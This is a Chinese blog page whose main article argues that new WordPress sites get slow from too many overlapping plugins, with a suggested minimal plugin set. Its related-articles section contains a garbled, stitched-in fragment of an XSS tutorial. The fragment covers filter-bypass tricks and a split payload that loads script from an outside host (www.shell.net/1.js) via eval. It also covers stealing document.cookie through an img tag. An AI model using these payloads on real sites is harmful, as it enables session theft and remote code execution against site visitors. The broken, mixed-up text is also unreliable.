WordPress独立站建站初期:插件不是越多越好

boyanx1周前技术教程3

有次接手一个刚搭好的 WordPress 外贸站,客户说“感觉越来越慢”,后台操作有时候要等 7、8 秒才响应。他还问:“是不是我主机买便宜了?”我一看后台,插件居然装了28个……♂

包括但不限于:

  • 3个SEO插件(竟然同时启用了)
  • 2个安全插件
  • 一个做谷歌分析的、一个做社媒分享的,还有5个从主题推荐里一键装上的,不知道干啥用
  • 重复的缓存插件:LiteSpeed 和 WP Super Cache 一起用……

这时候页面慢,不是主机的问题,而是插件互相“打架”。

WordPress 插件是双刃剑:功能全、易扩展,但用不好,直接炸站。

我排查了一下,发现这些问题最致命:

  1. 插件加载资源重复,比如 jQuery 被加载了两次
  2. 两个缓存插件抢着缓存数据,结果谁也没缓存成功
  3. 某个旧插件不兼容当前 PHP 版本,后台偶发报错
  4. 每次访客访问页面时,某个分析插件都会远程请求外链,结果加载超时

我把插件精简到只剩12个,替换掉3个功能重复的、关闭2个没在用的,站点速度直接恢复,客户还问我是不是给他偷偷换了主机。

建站初期我一向建议几个基本插件就好:

  • 一个轻量级 SEO 插件
  • 一个性能优化插件(不要多个)
  • 一个页面构建器(如果你不是写代码的)
  • 一个表单插件
  • 一个站点备份工具

其它什么“让访客弹窗弹出留言框”、“五彩导航菜单”之类的,真没必要一开始就搞上。


WordPress 是开放的,但不是每个功能都非得立马开启。
越早学会少即是多,你的网站越能跑得稳、跑得久。

相关文章

极客Web前端开发资源大荟萃#019(极客代码)

以下为本周的推荐的优质代码,非常漂亮实用。快来学习一下吧,以后工作遇到这样的需求 再也不用担心不会啦~酷炫的拖拽关闭弹出框的效果通过dynamics模拟物理动画库和draggabilly拖拽库实现的超...

JavaScript 事件冒泡--如何阻止点击事件

<div class="subcategories">这里有点击事件</div> <div class="subcategories"&g...

网站建设:从新手到高手(网站建设技巧)

现代化网站应用领域非常广泛,从个人形象网站展示、企业商业网站运作、到政府公益等服务网站,各行各业都需要网站建设。大体上可以归结四类:宣传型网站设计、产品型网站制作、电子商务型网站建设、定制型功能网站开...

简析js中的this的指向(js中this.)

回想当初在切图网做前端项目,用到js,经常用到this;那我们就谈谈js中this,如果说你没弄清this指向的问题,那基本可以说js没入门。this指向的问题的文章,上网搜资料能搜一大把,基本上都是...

一些JavaScript的入门知识(javascript入门基础)

前端开发的核心技术有三项:HTML、CSS和JavaScript。这三项技术中,HTML和CSS比较简单,JavaScript则相对来说复杂得多。所以,前端工程师的学习时间,大部分都花在JavaScr...

4.1.4 不闭合标签

4.1.5 使用回车、Tab等符号截断javascript

而浏览器中解析器中词法分析器会跳过空白跟换行之类的无效字符

使用回车截断javascript

使用tab截断javascript

4.1.6 利用过滤器规则

Ript>alert(1)t>

4.2

HTML编码

HTML标签中的某些属性值可以使用&#ASCII方式进行编码:

如把尖括号编码[ < ] -----> html十进制: < html十六进制:<

aaaa

4.3

Javascript编码

js提供了 3 种字符编码的策略:

· jsunicode编码,例如“e”编码为“\u0065”

· js十六进制,例如“e”编码为“\x65”

· js八进制,例如“e”编码为“\145”

4.4

跨站拆分法

安全研究员“剑心”发现某个网站存在XSS漏洞,漏洞出现在评论的联系方式处,但是,这处只能写入30个字符长度,必须的就占用了17个字符,剩下的只有13个字符可以支配,如此一来,这个XSS只能用来弹出一个警告框。

幸运的是,网站评论处可以重复留言,也就是说可以提交多个脚本标记,于是‘剑心’就巧妙的构造出以下XSS利用代码。

上述代码的作用是引入一个字符串变量Z,并且将下面的代码拆分开来。

document.write(' src=//www.shell.net/1.js>')

然后分几次将其嵌入到变量Z中,最后通过 eval(z) 巧妙地执行代码。

05

XSS漏洞利用

点击添加图片描述(最多60个字)

5.1

窃取Cookie

点击添加图片描述(最多60个字)

5.1.1 读取Cookie

直接在浏览器地址栏执行javascript:alert(document.cookie),就可以看到当前的cookie。

点击添加图片描述(最多60个字)

5.1.2 发送Cookie

5.1.2.1 利用img标签(最常用)

只需将alert(1)替换为以下Payload:

var img=document.createElement("img" alt="跨站脚本攻击(四)(跨站脚本攻击有哪些)">

跨站脚本攻击(四)(跨站脚本攻击有哪些)

04XSS漏洞挖掘技巧4.1常见的绕过姿势实际应用中web程序往往会通过一些过滤规则来阻止带有恶意代码的用户输入被显示,但由于HTML语言的松散性和各种标签的不同优先级,使得我们绕过过滤规则成为了可能...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。